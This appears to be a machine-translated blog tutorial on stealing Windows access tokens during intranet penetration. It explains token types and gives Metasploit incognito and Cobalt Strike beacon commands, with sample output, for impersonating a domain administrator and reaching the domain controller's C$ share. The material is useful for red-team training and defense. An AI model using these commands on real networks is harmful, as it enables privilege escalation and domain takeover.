当前位置:网站首页>Intranet penetration token stealing
Intranet penetration token stealing
2022-06-23 17:06:00 【West Lake first sword】
token
A token is an object that describes a process or thread security context .
After different users log on to the computer , Will generate a Access Token, This Token It is used when the user creates a process or thread ,
Keep copying , That explains A The user creates a process that does not B User's rights . Generally, users double-click to run a process will copy explorer.exe Of Access Toke
Access tokens are divided into :
authorization token (Delegation token): Interactive session login ( example : Local users log in 、 User desktop, etc )
Impersonate token (Impersonation token): Non interactive login ( example :net use Access shared files )
Two kinds of token It will be cleared only after the system is restarted ; Authorization token in ⽤ After account cancellation , The token becomes an analog token and is still valid .
Metasploit Token theft
This tool needs to be authorized as system Permission to view all token
# Load module
use incognito
# List token
list_tokens -u
# steal token
impersonate_token 'AA\Administrator'
meterpreter > impersonate_token 'AA\Administrator'
[+] Delegation token available
[+] Successfully impersonated user AA\Administrator
meterpreter > getuid
Server username: AA\Administrator
After executing the order , Return to the previous... With the following command token
rev2self
## or
drop_token
Cobalt strike Stealing domain administrator token in actual combat
The right is system after , Check the process , It is found that Firefox is running as a domain administrator , To steal .
beacon> steal_token 1260 Stealing tokens
beacon> rev2self Recovery token 
After success , Access to domain control succeeded This is equivalent to raising the permission to the domain administrator
dir\172.16.2.2\c$
边栏推荐
- Golang write file code example
- Another breakthrough! Alibaba cloud enters the Gartner cloud AI developer service Challenger quadrant
- Huawei mobile phones install APK through ADB and prompt "the signature is inconsistent. The application may have been modified."
- Why do we say that the data service API is the standard configuration of the data midrange?
- Leetcode: interview question 08.13 Stacking bin [top-down DFS + memory or bottom-up sorting + DP]
- OutputDebugString instructions and exception handling
- 以 27K 成功入职字节跳动,这份《 软件测试面试笔记》让我受益终身
- 聚焦:ZK-SNARK 技术
- VGg download (.Net file and imagenet-vgg-verydeep-19)
- ADC数字地DGND、模拟地AGND的谜团!
猜你喜欢

Shushulang passed the listing hearing: the gross profit margin of the tablet business fell, and the profit in 2021 fell by 11% year-on-year

华为手机通过adb安装APK提示“签名不一致,该应用可能已被修改”

Comparison of asemi Schottky diode and ultrafast recovery diode in switching power supply

Tensorrt Paser loading onnx inference use

走好数据中台最后一公里,为什么说数据服务 API 是数据中台的标配?

How to use SQL window functions

Thinking analysis of binary search method

Apache foundation officially announced Apache inlong as a top-level project

ASEMI超快恢复二极管ES1J参数,ES1J封装,ES1J规格

stylegan1: a style-based henerator architecture for gemerative adversarial networks
随机推荐
NLP paper reading | improving semantic representation of intention recognition: isotropic regularization method in supervised pre training
What does websocket do?
R language ggplot2 visualizes horizontal boxplot with coord_flip, and adds jittered data points to display the distribution
[today in history] June 23: Turing's birthday; The birth of the founder of the Internet; Reddit goes online
Redis cluster operation method
移动云共筑信创云能力底座,助力中国信创产业发展
JMeter stress testing tutorial
Asemi ultrafast recovery diode es1j parameters, es1j package, es1j specification
EasyPlayer移动端播放webrtc协议时长按播放页面无法关闭“关于我们”页面
The R language uses the RMSE function of the yardstick package to evaluate the performance of the regression model, the RMSE of the regression model on each fold of each cross validation (or resamplin
Elk log collection system deployment
混沌工程在云原生中间件稳定性治理中的实践分享
Lamp architecture that your girlfriend can read
官方零基础入门 Jetpack Compose 的中文课程来啦!
Freemark uses FTL files to generate word
Tensorrt Paser loading onnx inference use
[go]沙盒环境下调用支付宝扫码支付
How to select securities companies? Is it safe to open a mobile account?
[solution] NPM warn config global ` --global`, `--local` are deprecated Use `--location=global`
Interface ownership dispute